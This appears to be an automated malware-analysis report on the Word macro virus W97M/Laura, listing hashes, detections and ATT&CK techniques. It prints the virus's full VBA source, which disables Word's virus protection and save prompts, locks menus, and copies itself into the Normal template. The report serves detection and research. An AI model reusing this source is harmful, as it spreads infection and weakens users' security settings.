W97M/Laura — Office (OLE) malware analysis

Static analysis result for SHA-256 24b64063bf62440a…

MALICIOUS

Office (OLE)

Size: 35.0 KB
Created: 2000-08-09 14:07:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 020e3e94ef75faaf07c6dea5410c8892
SHA-1: 3368d5efebc084cf75c0a9e141acb8883daa7497
SHA-256: 24b64063bf62440a4217a15e0296691b0f6bbd940e227978f667a92101536c82
Risk Score: 120

Malware Insights

W97M/Laura · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to modify application settings and displays a message box with the text 'Laura, I love you.' The heuristic 'ClamAV: Doc.Trojan.Laura-1' and the presence of 'Total Konfuzion' in the document body and script strongly suggest the 'Laura' family. The macro also checks and potentially modifies a registry key related to virus protection.

Heuristics 3

  • ClamAV: Doc.Trojan.Laura-1 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Laura-1
  • VBA macros detected [medium] [OLE_VBA_MACROS] (1 related finding)
    Document contains VBA macro code
  • Document_Open macro [high] [OLE_VBA_DOCOPEN]
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2711 bytes
SHA-256: de7377cdea32dae3c957ec83ede6d76787d5e6192a2b8592a172269846f1bf73
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Laura()
    t = "W97M/Laura"
    l = "     Laura, I love you.     "
    m = "        -Total Konfuzion-"
    If Day(17) Then
        MsgBox l & vbCr & vbCr & m, vbSystemModal, t
        ActiveDocument.Shapes.AddTextEffect(msoTextEffect8, "Laura, I love you.", "Comic Sans MS", 36#, msoFalse, msoFalse, 155.6, 176.6).Select
        CommandBars("WordArt").Visible = (Rnd * 0)
        Beep
    End If
End Sub
Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
        t = "W97M/Laura"
        l = "Laura, I love you."
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
            .SavePropertiesPrompt = (Rnd * 0)
        End With
        With Application
            .EnableCancelKey = wdCancelDisabled
            .UserName = "Total Konfuzion"
            .UserInitials = "TK"
            .UserAddress = t & vbCr & l
        End With
        CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
        CommandBars("Tools").Controls("Templates and Add-ins...") = (Rnd * 0)
        CommandBars("Format").Controls("Style Gallery...") = (Rnd * 0)
        With Dialogs(wdDialogFileSummaryInfo)
            .Author = "Total Konfuzion"
            .Subject = "W97M/Laura"
            .Comments = "Laura, I love you"
            .Keywords = "-Total Konfuzion-"
            .Execute
        End With
        StatusBar = l
        If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Set d = i.VBProject.VBComponents.Item(1).CodeModule
        d.DeleteLines 1, d.CountOfLines
        d.AddFromString Vx
        Call Laura
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    End If
' W97M/Laura
'   by: Total Konfuzion
' Just to express my true love
' for you darling.. xxx
End Sub
Sub HelpAbout()
    t = "W97M/Laura"
    m = " -Total Konfuzion-"
    Application.Caption = t & "   -   " & "Laura, I love you."
    MsgBox "    " & t & vbCr & vbCr & m, vbSystemModal, t
    Dialogs(wdDialogHelpAbout).Show
End Sub